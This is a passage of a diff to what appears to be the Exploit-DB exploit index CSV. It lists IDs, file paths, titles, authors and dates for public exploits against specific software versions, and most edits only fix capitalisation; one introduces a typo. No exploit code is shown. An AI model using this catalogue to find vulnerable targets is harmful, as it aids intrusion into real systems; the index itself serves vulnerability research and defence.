Overflow",2009-12-03,pedamachephepto,linux,remote,0 +33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0 33389,platforms/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 -33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for Wordpress Plugin 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0 +33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps,0 33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 @@ -30136,14 +30137,14 @@ id,file,description,date,author,platform,type,port 33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 - update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 33438,platforms/multiple/webapps/33438.txt,"webMathematica 3 - 'MSP' Script Cross-Site Scripting",2009-12-23,"Floyd Fuh",multiple,webapps,0 33439,platforms/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",php,webapps,0 -33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus - 'controller' Parameter Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 +33440,platforms/php/webapps/33440.txt,"Joomla! iF Portfolio Nexus - 'Controller' Parameter Remote File Inclusion",2009-12-29,F10riX,php,webapps,0 33441,platforms/php/webapps/33441.txt,"Joomla! Joomulus Component 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps,0 33442,platforms/php/webapps/33442.txt,"FreePBX 2.5.2 - admin/config.php tech Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 33443,platforms/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps,0 33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 - 'dbhcms_core_dir' Parameter Remote File Inclusion",2009-12-28,Securitylab.ir,php,webapps,0 33445,platforms/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -33447,platforms/php/webapps/33447.php,"FreeWebshop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 +33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0 33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps,0 @@ -30152,8 +30153,8 @@ id,file,description,date,author,platform,type,port 33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0 33455,platforms/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps,0 -33456,platforms/php/webapps/33456.txt,"Stardevelop Live Help 2.6 - 'SERVER' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 -33457,platforms/php/webapps/33457.txt,"Photokorn 1.542 - Cross-Site Scripting / Remote File Inclusion",2009-12-31,indoushka,php,webapps,0 +33456,platforms/php/webapps/33456.txt,"StarDevelop Live Help 2.6 - 'SERVER' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps,0 +33457,platforms/php/webapps/33457.txt,"PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion",2009-12-31,indoushka,php,webapps,0 33458,platforms/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33459,platforms/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting / Directory Traversal",2009-12-31,indoushka,php,webapps,0 33460,platforms/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting",2010-01-01,indoushka,php,webapps,0 @@ -30169,25 +30170,25 @@ id,file,description,date,author,platform,type,port 33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0 33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 - HTTP 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",multiple,dos,0 -33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck and Globus",php,webapps,0 +33473,platforms/php/webapps/33473.txt,"Roundcube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 33478,platforms/php/webapps/33478.txt,"Joomla! Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0 -33479,platforms/osx/dos/33479.c,"Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 +33479,platforms/osx/dos/33479.c,"Apple Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting",2010-01-09,Cyber_945,asp,webapps,0 33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,"ViRuSMaN ",php,webapps,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 -33484,platforms/php/webapps/33484.txt,"DeltaScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 +33484,platforms/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0 -33486,platforms/php/webapps/33486.txt,"@lex GuestBook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 +33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PHPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Variable Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 33489,platforms/multiple/remote/33489.txt,"Ruby 1.9.1 - WEBrick Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33490,platforms/multiple/remote/33490.txt,"Nginx 0.7.64 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33493,platforms/multiple/webapps/33493.txt,"Mayan-EDms web-based document management OS system - Multiple Persistent Cross-Site Scripting",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 -33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2 build 535 32-bit - Crash (PoC)",2014-05-24,"Kaczinski Ramirez",windows,dos,0 +33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2 build 535 (32-bi)t - Crash (PoC)",2014-05-24,"Kaczinski Ramirez",windows,dos,0 33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial Of Service",2010-01-29,"Julien Cristau",linux,dos,0 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component - 'catid' Parameter SQL Injection",2010-01-31,snakespc,php,webapps,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre - PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos,0 @@ -30198,7 +30199,7 @@ id,file,description,date,author,platform,type,port 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 -33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33504,platforms/multiple/remote/33504.txt,"Boa WebServer 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Parameter Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps,0 33506,platforms/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",multiple,dos,0 33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,php,webapps,0 @@ -30213,7 +30214,7 @@ id,file,description,date,author,platform,type,port 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload",2014-05-26,Metasploit,multiple,remote,9855 -33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Remote Directory Traversal",2010-02-08,Markot,windows,remote,0 +33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server - 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0 @@ -30250,7 +30251,7 @@ id,file,description,date,author,platform,type,port 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' NULL Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 -33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 +33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",windows,remote,0 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 - Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,multiple,remote,0 @@ -30262,15 +30263,15 @@ id,file,description,date,author,platform,type,port 33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service",2010-01-22,Intevydis,multiple,dos,0 33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 - WebDAV Format String",2010-01-22,Intevydis,multiple,dos,0 33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps,0 -33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet Redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",multiple,remote,0 -33563,platforms/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",windows,remote,0 +33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",multiple,remote,0 +33563,platforms/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",windows,remote,0 33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0 33565,platforms/php/webapps/33565.txt,"PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting",2010-01-24,s4r4d0,php,webapps,0 33566,platforms/php/webapps/33566.txt,"Joomla! 3D Cloud 'tagcloud.swf' - Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0 33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",hardware,remote,0 33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 - Password Information Disclosure",2010-01-17,"Alejandro Ramos",hardware,remote,0 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage 3.0.2 - 'servercert' Parameter Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 -33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 - URI Redirection / Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 +33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting",2010-01-27,"Richard Brain",multiple,remote,0 33571,platforms/linux/dos/33571.txt,"PostgreSQL - 'bitsubstr' Buffer Overflow",2010-01-27,Intevydis,linux,dos,0 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0 @@ -30291,7 +30292,7 @@ id,file,description,date,author,platform,type,port 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service",2010-02-07,"599eme Man",multiple,dos,0 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial Of Service",2010-02-07,"599eme Man",windows,dos,0 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 -33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 Plugin - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 +33613,platforms/php/webapps/33613.txt,"WordPress Participants Database 1.5.4.8 Plugin - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0 33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0 @@ -30303,7 +30304,7 @@ id,file,description,date,author,platform,type,port 33622,platforms/linux/remote/33622.txt,"Accellion File Transfer - Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 33624,platforms/php/webapps/33624.txt,"vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 -33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 +33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'Safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80 33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33628,platforms/ios/webapps/33628.txt,"Files Desk Pro 1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081 @@ -30332,8 +30333,8 @@ id,file,description,date,author,platform,type,port 33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0 33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box - Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i - lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 -33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 -33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 +33663,platforms/multiple/remote/33663.txt,"IBM Websphere Portal 6.0.1.5 Build wp6015 - Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 +33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow (PoC)",2014-06-11,"Gabor Seljan",windows,dos,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products - Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 @@ -30347,7 +30348,7 @@ id,file,description,date,author,platform,type,port 33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 Beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion",2010-02-28,"cr4wl3r ",php,webapps,0 33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 - Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps,0 33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - 'loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 -33683,platforms/php/webapps/33683.txt,"Article Friendly - 'filename' Parameter Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 +33683,platforms/php/webapps/33683.txt,"Article Friendly - 'Filename' Parameter Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,"cr4wl3r ",php,webapps,0 33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Parameter Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0 33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting",2010-03-02,"Nahuel Grisolia",multiple,remote,0 @@ -30356,7 +30357,7 @@ id,file,description,date,author,platform,type,port 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote,0 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload",2010-03-03,indoushka,php,webapps,0 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0 -33707,platforms/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 +33707,platforms/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter MP3 File Divide-by-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service",2010-03-05,kingcope,bsd,dos,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 @@ -30364,10 +30365,10 @@ id,file,description,date,author,platform,type,port 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 -33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id parameter) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 +33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id Parameter) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Persistent Cross-Site Scripting",2014-06-11,rob222,php,webapps,0 33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 -33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem - 'id' Parameter Local File Inclusion",2010-03-05,"cr4wl3r ",php,webapps,0 +33716,platforms/php/webapps/33716.txt,"Saskia's ShopSystem - 'id' Parameter Local File Inclusion",2010-03-05,"cr4wl3r ",php,webapps,0 33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,multiple,webapps,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos,0 33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 @@ -30387,7 +30388,7 @@ id,file,description,date,author,platform,type,port 33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Parameter Cross-Site Scripting",2010-03-10,Liscker,asp,webapps,0 33731,platforms/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",multiple,webapps,0 33732,platforms/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0 -33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - .png File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0 +33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 - '.png' File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting",2010-03-10,ITSecTeam,php,webapps,0 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0 @@ -30423,12 +30424,12 @@ id,file,description,date,author,platform,type,port 33771,platforms/php/webapps/33771.txt,"Joomla! 'com_alert' Component - 'q_item' Parameter SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps,0 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injection",2010-03-18,blake,php,webapps,0 -33774,platforms/multiple/remote/33774.txt,"IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection",2010-03-19,Lament,multiple,remote,0 +33774,platforms/multiple/remote/33774.txt,"IBM Lotus Notes 6.5.6 - 'names.nsf' Open redirection",2010-03-19,Lament,multiple,remote,0 33775,platforms/windows/dos/33775.py,"Xilisoft Video Converter Wizard - '.yuv' Stack Buffer Overflow",2010-03-19,ITSecTeam,windows,dos,0 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 - GET Request Format String Denial Of Service",2010-03-20,Rick2600,windows,dos,0 -33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps,0 +33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open redirection",2010-03-22,Lament,jsp,webapps,0 33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x - 'names.nsf' Cross-Site Scripting",2010-03-19,Lament,multiple,remote,0 33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusion",2010-03-23,eidelweiss,php,webapps,0 33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,php,webapps,0 @@ -30445,15 +30446,15 @@ id,file,description,date,author,platform,type,port 33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products - Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 33795,platforms/php/webapps/33795.txt,"Joomla! 'com_aml_2' Component - 'art' Parameter SQL Injection",2010-03-23,Metropolis,php,webapps,0 33796,platforms/php/webapps/33796.txt,"Joomla! 'com_cb' Component - 'cat' Parameter SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 